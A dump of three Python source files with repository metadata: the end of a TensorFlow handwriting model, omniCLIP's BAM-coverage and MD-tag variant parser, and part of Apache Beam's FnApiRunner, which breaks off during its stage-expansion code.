self.saver = tf.train.Saver(tf.global_variables())
global_step = int(load_path.split('-')[-1])
return load_was_success, global_step
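# Illustrative sanity check (not part of the original model): the bivariate
# Gaussian density used in gaussian2d above (eqs. 24-25 of
# https://arxiv.org/abs/1308.0850) can be mirrored in plain NumPy to
# spot-check values while debugging.
def gaussian2d_np(x1, x2, mu1, mu2, s1, s2, rho):
    """NumPy twin of Model's gaussian2d; all arguments are array-like."""
    z = ((x1 - mu1) / s1) ** 2 + ((x2 - mu2) / s2) ** 2 \
        - 2 * rho * (x1 - mu1) * (x2 - mu2) / (s1 * s2)
    return np.exp(-z / (2 * (1 - rho ** 2))) / \
        (2 * np.pi * s1 * s2 * np.sqrt(1 - rho ** 2))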
|
Charleo85/ml_project
|
resource/scribe/model.py
|
Python
|
mit
| 10,496
|
[
"Gaussian"
] |
4a6ac518c568bac94dcca650aec0fa95b9b37e0a6eb35686ab925be3fb3fec61
|
"""
omniCLIP is a CLIP-Seq peak caller
Copyright (C) 2017 Philipp Boss
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import numpy as np
import re
import warnings
def GetRawCoverageFromRegion(
SamReader, Chr, Start, Stop, Collapse=False, CovType='coverage',
Genome='', legacy=True, mask_flank_variants=3, max_mm=2,
rev_strand=None, ign_out_rds=False, gene_strand=0):
"""Extract coverage from a BAM-file.
This function gets from a BAM-file the coverage and returns it as a sparse
vector for each chromosome and strand.
"""
# Initiate nucleotide lookup
NuclDict = {'A': 0, 'C': 1, 'G': 2, 'T': 3, 'D': 4}
# Prepare regular expression
r = re.compile('([\\^]*[ACGTN]+)[0]*')
# Compute Length of the region
RegionLength = Stop - Start
# Initialise the length vectors
ret_arrays = dict()
ret_arrays['variants'] = np.zeros((5, RegionLength), dtype=np.int32)
ret_arrays['read-ends'] = np.zeros((2, RegionLength), dtype=np.int32)
ret_arrays['coverage'] = np.zeros((1, RegionLength), dtype=np.int32)
# Modify gene_strand if the reads are coming from the reverse strand
if rev_strand is not None:
if rev_strand == 0:
gene_strand *= -1 # Swap the strand
# Iterate over Reads
iter = SamReader.fetch(Chr, Start, Stop)
for CurrRead in iter:
# Check for mismatches
if CurrRead.get_tag('NM') > max_mm:
continue
        # Check that the position is within gene boundaries
CurrReadstart = CurrRead.pos - Start
if ign_out_rds:
LastPos = (CurrReadstart
+ sum([e[1] for e in CurrRead.cigar if e[0] != 4])
- 1)
if (CurrReadstart < 0) or (LastPos > Stop - Start):
continue
# Check whether the read strand matches else skip this read
if rev_strand is not None:
# Check if read is paired
if CurrRead.flag & 1:
if gene_strand == -1:
# CurrRead.flag & 16 means read is on reverse strand
# CurrRead.flag & 32 means mate read is on reverse strand
# CurrRead.flag & 64 means read is first in pair
# CurrRead.flag & 128 means read is second in pair
if ((CurrRead.flag & 16) > 0) & ((CurrRead.flag & 64) > 0):
continue
if ((CurrRead.flag & 16) == 0) & ((CurrRead.flag & 128) > 0):
continue
else:
if ((CurrRead.flag & 16) > 0) & ((CurrRead.flag & 128) > 0):
continue
if ((CurrRead.flag & 16) == 0) & ((CurrRead.flag & 64) > 0):
continue
else:
if gene_strand == -1:
if ((CurrRead.flag & 16) > 0):
continue
else:
if ((CurrRead.flag & 16) == 0):
continue
# Compute relative positions of read
CurrReadstart = CurrRead.pos - Start
FirstPos = CurrReadstart
LastPos = FirstPos + sum([e[1] for e in CurrRead.cigar if e[0] != 4])
        # Check how many reads the current read represents (collapsing)
if Collapse:
Mult = CurrRead.qname.split('-')
if len(Mult) == 1:
raise Exception('Error: Collapsing of read: ' + CurrRead.qname)
Mult = int(Mult[-1])
else:
Mult = 1
# Processing for variants
if 'variants' in CovType:
GlobalVariantPos = GetVariantsFromRead(CurrRead, r)
# Transform letters into numbers, A - 0, C - 1, G - 2, T - 3
for e in GlobalVariantPos:
if e[1] == 'N':
continue
# Check if variant falls into flanks
if (e[0] - Start) < (FirstPos + mask_flank_variants):
continue
elif (e[0] - Start) > (LastPos - 1 - mask_flank_variants):
continue
# Check whether the variant lies outside of the gene
if e[0] - Start < 0 or e[0] - Start >= RegionLength:
continue
# Process the variant
ret_arrays['variants'][NuclDict[e[1]], e[0] - Start] += Mult
# Processing for read extremities
if 'read-ends' in CovType:
if CurrRead.flag & 1:
# Check if the read is paired end.
# If yes chose the outer ends as ends.
if FirstPos >= 0:
if ((CurrRead.flag & 128) > 0) & ((CurrRead.flag & 32) > 0):
ret_arrays['read-ends'][0, CurrReadstart] += Mult
if ((CurrRead.flag & 64) > 0) & ((CurrRead.flag & 32) > 0):
ret_arrays['read-ends'][1, CurrReadstart] += Mult
if LastPos < RegionLength:
if ((CurrRead.flag & 16) > 0) & ((CurrRead.flag & 64) > 0):
ret_arrays['read-ends'][1, LastPos - 1] += Mult
if ((CurrRead.flag & 16) > 0) & ((CurrRead.flag & 128) > 0):
ret_arrays['read-ends'][0, LastPos - 1] += Mult
else:
if FirstPos >= 0:
if ((CurrRead.flag & 16) > 0):
ret_arrays['read-ends'][1, CurrReadstart] += Mult
else:
ret_arrays['read-ends'][0, CurrReadstart] += Mult
if LastPos < RegionLength:
if ((CurrRead.flag & 16) > 0):
ret_arrays['read-ends'][0, LastPos - 1] += Mult
else:
ret_arrays['read-ends'][1, LastPos] += Mult
# Processing for coverage
for cig in CurrRead.cigar:
# Check which type to get the coverage for
if cig[0] == 0:
_start = max(0, CurrReadstart)
_end = min(RegionLength, max(0, CurrReadstart + cig[1]))
ret_arrays['coverage'][0, _start:_end] += Mult
if cig[0] != 4:
CurrReadstart += cig[1]
return ret_arrays
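# Illustrative usage sketch (not part of omniCLIP; ``sam_reader`` is assumed
# to be an open pysam.AlignmentFile):
def _demo_coverage(sam_reader, chrom, start, stop):
    """Fetch coverage and read-end counts for a genomic region."""
    arrs = GetRawCoverageFromRegion(
        sam_reader, chrom, start, stop, CovType=['coverage', 'read-ends'])
    return arrs['coverage'], arrs['read-ends']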
def GetVariantsFromRead(CurrRead, r):
"""Parse variants from read.
Takes a pySAM read and returns variants based on the MD Tag the Variants
and their absolute positions.
"""
# Get the sequence
Seq = CurrRead.seq
# Get the MD tag
Tag = CurrRead.get_tag('MD')
# Split the string
SplitTag = [e for e in r.split(Tag) if len(e) > 0]
if len(SplitTag) == 1:
return []
# Convert the groups to a list of local positions and nucleotides
TempPos = 0
Pos = []
for i in range(0, len(SplitTag)):
if SplitTag[i].isdigit():
# Increase the counter by the number of positions where there is no
# mismatch
TempPos += int(SplitTag[i])
else:
if SplitTag[i][0] == '^': # Check if it is a deletion
continue
else:
for l in range(len(SplitTag[i])):
Pos.append([TempPos, Seq[TempPos]])
TempPos += 1
# Convert the local positions from Pos to global positions.
CurrGlobalPos = CurrRead.pos
GlobalPos = []
# Iterate over the segments of the cigar string
for cig in CurrRead.cigar:
        # Split the positions in Pos into the ones falling into the current
        # CIGAR segment and the rest
# Sequence match
if cig[0] == 0:
CurrSeg = [e for e in Pos if e[0] < cig[1]]
Pos = [[e[0] - cig[1], e[1]] for e in Pos if e[0] >= cig[1]]
for e in CurrSeg:
GlobalPos.append([CurrGlobalPos + e[0], e[1]])
CurrGlobalPos += cig[1]
# Insertion to the reference
elif cig[0] == 1:
continue
# Deletion from the reference
elif cig[0] == 2:
for temp_pos in range(cig[1]):
GlobalPos.append([CurrGlobalPos + temp_pos, 'D'])
CurrGlobalPos += cig[1]
continue
# Skipped region from the reference
elif cig[0] == 3:
CurrGlobalPos += cig[1]
# Soft clipping (clipped sequences present in SEQ)
elif cig[0] == 4:
continue
# Hard clipping (clipped sequences NOT present in SEQ)
elif cig[0] == 5:
continue
CurrGlobalPos += cig[1]
# Padding (silent deletion from padded reference)
elif cig[0] == 6:
continue
# Sequence match
elif cig[0] == 7:
CurrSeg = [e for e in Pos if e[0] < cig[1]]
Pos = [[e[0] - cig[1], e[1]] for e in Pos if e[0] >= cig[1]]
for e in CurrSeg:
GlobalPos.append([CurrGlobalPos + e[0], e[1]])
CurrGlobalPos += cig[1]
# Sequence mismatch
elif cig[0] == 8:
CurrSeg = [e for e in Pos if e[0] < cig[1]]
Pos = [[e[0] - cig[1], e[1]] for e in Pos if e[0] >= cig[1]]
for e in CurrSeg:
GlobalPos.append([CurrGlobalPos + e[0], e[1]])
CurrGlobalPos += cig[1]
else:
warnings.warn("Encountered unhandled CIGAR character in read "
+ CurrRead.qname)
CurrGlobalPos += cig[1]
return GlobalPos
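def _demo_md_split(tag='10A5^AC6'):
    """Sketch (not part of omniCLIP): tokenize an MD tag with the regex above.

    For the default example this returns ['10', 'A', '5', '^AC', '6'],
    i.e. match lengths, substituted bases, and a '^'-prefixed deletion.
    """
    r = re.compile('([\\^]*[ACGTN]+)[0]*')
    return [e for e in r.split(tag) if len(e) > 0]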
|
philippdre/omniCLIP
|
omniCLIP/data_parsing/GetCoverageFromBam.py
|
Python
|
gpl-3.0
| 10,108
|
[
"pysam"
] |
c9721cec0c86c23e16579c0709f26c60afb1f2669f3c9624c6f9c669e8a3cb02
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A PipelineRunner using the SDK harness.
"""
from __future__ import absolute_import
from __future__ import print_function
import collections
import contextlib
import copy
import logging
import os
import queue
import subprocess
import sys
import threading
import time
from builtins import object
from concurrent import futures
import grpc
import apache_beam as beam # pylint: disable=ungrouped-imports
from apache_beam import coders
from apache_beam import metrics
from apache_beam.coders.coder_impl import create_InputStream
from apache_beam.coders.coder_impl import create_OutputStream
from apache_beam.metrics import monitoring_infos
from apache_beam.metrics.execution import MetricKey
from apache_beam.metrics.execution import MetricsEnvironment
from apache_beam.options import pipeline_options
from apache_beam.options.value_provider import RuntimeValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability import python_urns
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners import pipeline_context
from apache_beam.runners import runner
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import sdk_worker
from apache_beam.transforms import trigger
from apache_beam.transforms.window import GlobalWindows
from apache_beam.utils import profiler
from apache_beam.utils import proto_utils
# This module is experimental. No backwards-compatibility guarantees.
ENCODED_IMPULSE_VALUE = beam.coders.WindowedValueCoder(
beam.coders.BytesCoder(),
beam.coders.coders.GlobalWindowCoder()).get_impl().encode_nested(
beam.transforms.window.GlobalWindows.windowed_value(b''))
IMPULSE_BUFFER = b'impulse'
class BeamFnControlServicer(beam_fn_api_pb2_grpc.BeamFnControlServicer):
_DONE = object()
def __init__(self):
self._push_queue = queue.Queue()
self._futures_by_id = dict()
self._read_thread = threading.Thread(
name='beam_control_read', target=self._read)
self._started = False
self._uid_counter = 0
def Control(self, iterator, context):
self._inputs = iterator
# Note: We only support one client for now.
self._read_thread.start()
self._started = True
while True:
to_push = self._push_queue.get()
if to_push is self._DONE:
return
yield to_push
def _read(self):
for data in self._inputs:
self._futures_by_id.pop(data.instruction_id).set(data)
def push(self, item):
if item is self._DONE:
future = None
else:
if not item.instruction_id:
self._uid_counter += 1
item.instruction_id = 'control_%s' % self._uid_counter
future = ControlFuture(item.instruction_id)
self._futures_by_id[item.instruction_id] = future
self._push_queue.put(item)
return future
def done(self):
self.push(self._DONE)
# Can't join a thread before it's started.
while not self._started:
time.sleep(.01)
self._read_thread.join()
class _GroupingBuffer(object):
"""Used to accumulate groupded (shuffled) results."""
def __init__(self, pre_grouped_coder, post_grouped_coder, windowing):
self._key_coder = pre_grouped_coder.key_coder()
self._pre_grouped_coder = pre_grouped_coder
self._post_grouped_coder = post_grouped_coder
self._table = collections.defaultdict(list)
self._windowing = windowing
self._grouped_output = None
def append(self, elements_data):
if self._grouped_output:
raise RuntimeError('Grouping table append after read.')
input_stream = create_InputStream(elements_data)
coder_impl = self._pre_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
# TODO(robertwb): We could optimize this even more by using a
# window-dropping coder for the data plane.
is_trivial_windowing = self._windowing.is_default()
while input_stream.size() > 0:
windowed_key_value = coder_impl.decode_from_stream(input_stream, True)
key, value = windowed_key_value.value
self._table[key_coder_impl.encode(key)].append(
value if is_trivial_windowing
else windowed_key_value.with_value(value))
def __iter__(self):
if not self._grouped_output:
output_stream = create_OutputStream()
if self._windowing.is_default():
globally_window = GlobalWindows.windowed_value(None).with_value
windowed_key_values = lambda key, values: [
globally_window((key, values))]
else:
trigger_driver = trigger.create_trigger_driver(self._windowing, True)
windowed_key_values = trigger_driver.process_entire_key
coder_impl = self._post_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
for encoded_key, windowed_values in self._table.items():
key = key_coder_impl.decode(encoded_key)
for wkvs in windowed_key_values(key, windowed_values):
coder_impl.encode_to_stream(wkvs, output_stream, True)
self._grouped_output = [output_stream.get()]
self._table = None
return iter(self._grouped_output)
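def _grouping_buffer_demo(pre_grouped_coder, post_grouped_coder, windowing,
                          encoded_bundles):
  """Sketch (not part of Beam): _GroupingBuffer as a tiny in-memory shuffle.

  Encoded windowed KV bundles go in via append(); iterating the buffer then
  yields the grouped output encoded with the post-grouping coder.
  """
  buf = _GroupingBuffer(pre_grouped_coder, post_grouped_coder, windowing)
  for elements_data in encoded_bundles:
    buf.append(elements_data)
  return list(buf)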
class _WindowGroupingBuffer(object):
"""Used to partition windowed side inputs."""
def __init__(self, side_input_data, coder):
# Here's where we would use a different type of partitioning
# (e.g. also by key) for a different access pattern.
if side_input_data.access_pattern == common_urns.side_inputs.ITERABLE.urn:
      self._kv_extractor = lambda value: ('', value)
self._key_coder = coders.SingletonCoder('')
self._value_coder = coder.wrapped_value_coder
elif side_input_data.access_pattern == common_urns.side_inputs.MULTIMAP.urn:
      self._kv_extractor = lambda value: value
self._key_coder = coder.wrapped_value_coder.key_coder()
self._value_coder = (
coder.wrapped_value_coder.value_coder())
else:
raise ValueError(
"Unknown access pattern: '%s'" % side_input_data.access_pattern)
self._windowed_value_coder = coder
self._window_coder = coder.window_coder
self._values_by_window = collections.defaultdict(list)
def append(self, elements_data):
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_value = self._windowed_value_coder.get_impl(
).decode_from_stream(input_stream, True)
      key, value = self._kv_extractor(windowed_value.value)
for window in windowed_value.windows:
self._values_by_window[key, window].append(value)
def encoded_items(self):
value_coder_impl = self._value_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
for (key, window), values in self._values_by_window.items():
encoded_window = self._window_coder.encode(window)
encoded_key = key_coder_impl.encode_nested(key)
output_stream = create_OutputStream()
for value in values:
value_coder_impl.encode_to_stream(value, output_stream, True)
yield encoded_key, encoded_window, output_stream.get()
class FnApiRunner(runner.PipelineRunner):
def __init__(self, use_grpc=False, sdk_harness_factory=None, bundle_repeat=0):
"""Creates a new Fn API Runner.
Args:
use_grpc: whether to use grpc or simply make in-process calls
defaults to False
sdk_harness_factory: callable used to instantiate customized sdk harnesses
        typically not set by users
bundle_repeat: replay every bundle this many extra times, for profiling
and debugging
"""
super(FnApiRunner, self).__init__()
self._last_uid = -1
self._use_grpc = use_grpc
if sdk_harness_factory and not use_grpc:
raise ValueError('GRPC must be used if a harness factory is provided.')
self._sdk_harness_factory = sdk_harness_factory
self._bundle_repeat = bundle_repeat
self._progress_frequency = None
self._profiler_factory = None
def _next_uid(self):
self._last_uid += 1
return str(self._last_uid)
def run_pipeline(self, pipeline):
MetricsEnvironment.set_metrics_supported(False)
RuntimeValueProvider.set_runtime_options({})
# This is sometimes needed if type checking is disabled
# to enforce that the inputs (and outputs) of GroupByKey operations
# are known to be KVs.
from apache_beam.runners.dataflow.dataflow_runner import DataflowRunner
pipeline.visit(DataflowRunner.group_by_key_input_visitor())
self._bundle_repeat = self._bundle_repeat or pipeline._options.view_as(
pipeline_options.DirectOptions).direct_runner_bundle_repeat
self._profiler_factory = profiler.Profile.factory_from_options(
pipeline._options.view_as(pipeline_options.ProfilingOptions))
return self.run_via_runner_api(pipeline.to_runner_api())
def run_via_runner_api(self, pipeline_proto):
return self.run_stages(*self.create_stages(pipeline_proto))
@contextlib.contextmanager
def maybe_profile(self):
if self._profiler_factory:
try:
profile_id = 'direct-' + subprocess.check_output(
['git', 'rev-parse', '--abbrev-ref', 'HEAD']
).decode(errors='ignore').strip()
except subprocess.CalledProcessError:
profile_id = 'direct-unknown'
profiler = self._profiler_factory(profile_id, time_prefix='')
else:
profiler = None
if profiler:
with profiler:
yield
if not self._bundle_repeat:
logging.warning(
'The --direct_runner_bundle_repeat option is not set; '
'a significant portion of the profile may be one-time overhead.')
path = profiler.profile_output
print('CPU Profile written to %s' % path)
try:
import gprof2dot # pylint: disable=unused-variable
if not subprocess.call([
sys.executable, '-m', 'gprof2dot',
'-f', 'pstats', path, '-o', path + '.dot']):
if not subprocess.call(
['dot', '-Tsvg', '-o', path + '.svg', path + '.dot']):
print('CPU Profile rendering at file://%s.svg'
% os.path.abspath(path))
except ImportError:
# pylint: disable=superfluous-parens
print('Please install gprof2dot and dot for profile renderings.')
else:
# Empty context.
yield
def create_stages(self, pipeline_proto):
# First define a couple of helpers.
def union(a, b):
# Minimize the number of distinct sets.
if not a or a == b:
return b
elif not b:
return a
else:
return frozenset.union(a, b)
class Stage(object):
"""A set of Transforms that can be sent to the worker for processing."""
def __init__(self, name, transforms,
downstream_side_inputs=None, must_follow=frozenset()):
self.name = name
self.transforms = transforms
self.downstream_side_inputs = downstream_side_inputs
self.must_follow = must_follow
self.timer_pcollections = []
def __repr__(self):
must_follow = ', '.join(prev.name for prev in self.must_follow)
downstream_side_inputs = ', '.join(
str(si) for si in self.downstream_side_inputs)
return "%s\n %s\n must follow: %s\n downstream_side_inputs: %s" % (
self.name,
'\n'.join(["%s:%s" % (transform.unique_name, transform.spec.urn)
for transform in self.transforms]),
must_follow,
downstream_side_inputs)
def can_fuse(self, consumer):
def no_overlap(a, b):
return not a.intersection(b)
return (
not self in consumer.must_follow
and not self.is_flatten() and not consumer.is_flatten()
and no_overlap(self.downstream_side_inputs, consumer.side_inputs()))
def fuse(self, other):
return Stage(
"(%s)+(%s)" % (self.name, other.name),
self.transforms + other.transforms,
union(self.downstream_side_inputs, other.downstream_side_inputs),
union(self.must_follow, other.must_follow))
def is_flatten(self):
return any(transform.spec.urn == common_urns.primitives.FLATTEN.urn
for transform in self.transforms)
def side_inputs(self):
for transform in self.transforms:
if transform.spec.urn == common_urns.primitives.PAR_DO.urn:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for side_input in payload.side_inputs:
yield transform.inputs[side_input]
def has_as_main_input(self, pcoll):
for transform in self.transforms:
if transform.spec.urn == common_urns.primitives.PAR_DO.urn:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
local_side_inputs = payload.side_inputs
else:
local_side_inputs = {}
for local_id, pipeline_id in transform.inputs.items():
if pcoll == pipeline_id and local_id not in local_side_inputs:
return True
def deduplicate_read(self):
seen_pcolls = set()
new_transforms = []
for transform in self.transforms:
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
pcoll = only_element(list(transform.outputs.items()))[1]
if pcoll in seen_pcolls:
continue
seen_pcolls.add(pcoll)
new_transforms.append(transform)
self.transforms = new_transforms
# Some helper functions.
def add_or_get_coder_id(coder_proto):
for coder_id, coder in pipeline_components.coders.items():
if coder == coder_proto:
return coder_id
new_coder_id = unique_name(pipeline_components.coders, 'coder')
pipeline_components.coders[new_coder_id].CopyFrom(coder_proto)
return new_coder_id
def windowed_coder_id(coder_id, window_coder_id):
proto = beam_runner_api_pb2.Coder(
spec=beam_runner_api_pb2.SdkFunctionSpec(
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.coders.WINDOWED_VALUE.urn)),
component_coder_ids=[coder_id, window_coder_id])
return add_or_get_coder_id(proto)
safe_coders = {}
def length_prefix_unknown_coders(pcoll, pipeline_components):
"""Length prefixes coder for the given PCollection.
Updates pipeline_components to have a length prefixed coder for
every component coder within the PCollection that is not understood
natively by the runner. Also populates the safe_coders map with
a corresponding runner side coder which is also length prefixed but
compatible for the runner to instantiate.
"""
good_coder_urns = set(
value.urn for value in common_urns.coders.__dict__.values())
coders = pipeline_components.coders
for coder_id, coder_proto in coders.items():
if coder_proto.spec.spec.urn == common_urns.coders.BYTES.urn:
bytes_coder_id = coder_id
break
else:
bytes_coder_id = unique_name(coders, 'bytes_coder')
pipeline_components.coders[bytes_coder_id].CopyFrom(
beam.coders.BytesCoder().to_runner_api(None))
coder_substitutions = {}
def wrap_unknown_coders(coder_id, with_bytes):
if (coder_id, with_bytes) not in coder_substitutions:
wrapped_coder_id = None
coder_proto = coders[coder_id]
if coder_proto.spec.spec.urn == common_urns.coders.LENGTH_PREFIX.urn:
coder_substitutions[coder_id, with_bytes] = (
bytes_coder_id if with_bytes else coder_id)
elif coder_proto.spec.spec.urn in good_coder_urns:
wrapped_components = [wrap_unknown_coders(c, with_bytes)
for c in coder_proto.component_coder_ids]
if wrapped_components == list(coder_proto.component_coder_ids):
# Use as is.
coder_substitutions[coder_id, with_bytes] = coder_id
else:
wrapped_coder_id = unique_name(
coders,
coder_id + ("_bytes" if with_bytes else "_len_prefix"))
coders[wrapped_coder_id].CopyFrom(coder_proto)
coders[wrapped_coder_id].component_coder_ids[:] = [
wrap_unknown_coders(c, with_bytes)
for c in coder_proto.component_coder_ids]
coder_substitutions[coder_id, with_bytes] = wrapped_coder_id
else:
# Not a known coder.
if with_bytes:
coder_substitutions[coder_id, with_bytes] = bytes_coder_id
else:
wrapped_coder_id = unique_name(coders, coder_id + "_len_prefix")
len_prefix_coder_proto = beam_runner_api_pb2.Coder(
spec=beam_runner_api_pb2.SdkFunctionSpec(
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.coders.LENGTH_PREFIX.urn)),
component_coder_ids=[coder_id])
coders[wrapped_coder_id].CopyFrom(len_prefix_coder_proto)
coder_substitutions[coder_id, with_bytes] = wrapped_coder_id
# This operation is idempotent.
if wrapped_coder_id:
coder_substitutions[wrapped_coder_id, with_bytes] = wrapped_coder_id
return coder_substitutions[coder_id, with_bytes]
new_coder_id = wrap_unknown_coders(pcoll.coder_id, False)
safe_coders[new_coder_id] = wrap_unknown_coders(pcoll.coder_id, True)
pcoll.coder_id = new_coder_id
# Now define the "optimization" phases.
def impulse_to_input(stages):
bytes_coder_id = add_or_get_coder_id(
beam.coders.BytesCoder().to_runner_api(None))
global_window_coder_id = add_or_get_coder_id(
beam.coders.coders.GlobalWindowCoder().to_runner_api(None))
globally_windowed_bytes_coder_id = windowed_coder_id(
bytes_coder_id, global_window_coder_id)
for stage in stages:
# First map Reads, if any, to Impulse + triggered read op.
for transform in list(stage.transforms):
if transform.spec.urn == common_urns.deprecated_primitives.READ.urn:
read_pc = only_element(transform.outputs.values())
read_pc_proto = pipeline_components.pcollections[read_pc]
impulse_pc = unique_name(
pipeline_components.pcollections, 'Impulse')
pipeline_components.pcollections[impulse_pc].CopyFrom(
beam_runner_api_pb2.PCollection(
unique_name=impulse_pc,
coder_id=globally_windowed_bytes_coder_id,
windowing_strategy_id=read_pc_proto.windowing_strategy_id,
is_bounded=read_pc_proto.is_bounded))
stage.transforms.remove(transform)
# TODO(robertwb): If this goes multi-process before fn-api
# read is default, expand into split + reshuffle + read.
stage.transforms.append(
beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Impulse',
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.primitives.IMPULSE.urn),
outputs={'out': impulse_pc}))
stage.transforms.append(
beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name,
spec=beam_runner_api_pb2.FunctionSpec(
urn=python_urns.IMPULSE_READ_TRANSFORM,
payload=transform.spec.payload),
inputs={'in': impulse_pc},
outputs={'out': read_pc}))
# Now map impulses to inputs.
for transform in list(stage.transforms):
if transform.spec.urn == common_urns.primitives.IMPULSE.urn:
stage.transforms.remove(transform)
stage.transforms.append(
beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name,
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_INPUT_URN,
payload=IMPULSE_BUFFER),
outputs=transform.outputs))
yield stage
def lift_combiners(stages):
"""Expands CombinePerKey into pre- and post-grouping stages.
... -> CombinePerKey -> ...
becomes
... -> PreCombine -> GBK -> MergeAccumulators -> ExtractOutput -> ...
"""
for stage in stages:
assert len(stage.transforms) == 1
transform = stage.transforms[0]
if transform.spec.urn == common_urns.composites.COMBINE_PER_KEY.urn:
combine_payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.CombinePayload)
input_pcoll = pipeline_components.pcollections[only_element(
list(transform.inputs.values()))]
output_pcoll = pipeline_components.pcollections[only_element(
list(transform.outputs.values()))]
windowed_input_coder = pipeline_components.coders[
input_pcoll.coder_id]
element_coder_id, window_coder_id = (
windowed_input_coder.component_coder_ids)
element_coder = pipeline_components.coders[element_coder_id]
key_coder_id, _ = element_coder.component_coder_ids
accumulator_coder_id = combine_payload.accumulator_coder_id
key_accumulator_coder = beam_runner_api_pb2.Coder(
spec=beam_runner_api_pb2.SdkFunctionSpec(
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.coders.KV.urn)),
component_coder_ids=[key_coder_id, accumulator_coder_id])
key_accumulator_coder_id = add_or_get_coder_id(key_accumulator_coder)
accumulator_iter_coder = beam_runner_api_pb2.Coder(
spec=beam_runner_api_pb2.SdkFunctionSpec(
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.coders.ITERABLE.urn)),
component_coder_ids=[accumulator_coder_id])
accumulator_iter_coder_id = add_or_get_coder_id(
accumulator_iter_coder)
key_accumulator_iter_coder = beam_runner_api_pb2.Coder(
spec=beam_runner_api_pb2.SdkFunctionSpec(
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.coders.KV.urn)),
component_coder_ids=[key_coder_id, accumulator_iter_coder_id])
key_accumulator_iter_coder_id = add_or_get_coder_id(
key_accumulator_iter_coder)
precombined_pcoll_id = unique_name(
pipeline_components.pcollections, 'pcollection')
pipeline_components.pcollections[precombined_pcoll_id].CopyFrom(
beam_runner_api_pb2.PCollection(
unique_name=transform.unique_name + '/Precombine.out',
coder_id=windowed_coder_id(
key_accumulator_coder_id, window_coder_id),
windowing_strategy_id=input_pcoll.windowing_strategy_id,
is_bounded=input_pcoll.is_bounded))
grouped_pcoll_id = unique_name(
pipeline_components.pcollections, 'pcollection')
pipeline_components.pcollections[grouped_pcoll_id].CopyFrom(
beam_runner_api_pb2.PCollection(
unique_name=transform.unique_name + '/Group.out',
coder_id=windowed_coder_id(
key_accumulator_iter_coder_id, window_coder_id),
windowing_strategy_id=output_pcoll.windowing_strategy_id,
is_bounded=output_pcoll.is_bounded))
merged_pcoll_id = unique_name(
pipeline_components.pcollections, 'pcollection')
pipeline_components.pcollections[merged_pcoll_id].CopyFrom(
beam_runner_api_pb2.PCollection(
unique_name=transform.unique_name + '/Merge.out',
coder_id=windowed_coder_id(
key_accumulator_coder_id, window_coder_id),
windowing_strategy_id=output_pcoll.windowing_strategy_id,
is_bounded=output_pcoll.is_bounded))
def make_stage(base_stage, transform):
return Stage(
transform.unique_name,
[transform],
downstream_side_inputs=base_stage.downstream_side_inputs,
must_follow=base_stage.must_follow)
yield make_stage(
stage,
beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Precombine',
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.combine_components.COMBINE_PGBKCV.urn,
payload=transform.spec.payload),
inputs=transform.inputs,
outputs={'out': precombined_pcoll_id}))
yield make_stage(
stage,
beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Group',
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.primitives.GROUP_BY_KEY.urn),
inputs={'in': precombined_pcoll_id},
outputs={'out': grouped_pcoll_id}))
yield make_stage(
stage,
beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Merge',
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.combine_components
.COMBINE_MERGE_ACCUMULATORS.urn,
payload=transform.spec.payload),
inputs={'in': grouped_pcoll_id},
outputs={'out': merged_pcoll_id}))
yield make_stage(
stage,
beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/ExtractOutputs',
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.combine_components
.COMBINE_EXTRACT_OUTPUTS.urn,
payload=transform.spec.payload),
inputs={'in': merged_pcoll_id},
outputs=transform.outputs))
else:
yield stage
def expand_gbk(stages):
"""Transforms each GBK into a write followed by a read.
"""
for stage in stages:
assert len(stage.transforms) == 1
transform = stage.transforms[0]
if transform.spec.urn == common_urns.primitives.GROUP_BY_KEY.urn:
for pcoll_id in transform.inputs.values():
length_prefix_unknown_coders(
pipeline_components.pcollections[pcoll_id], pipeline_components)
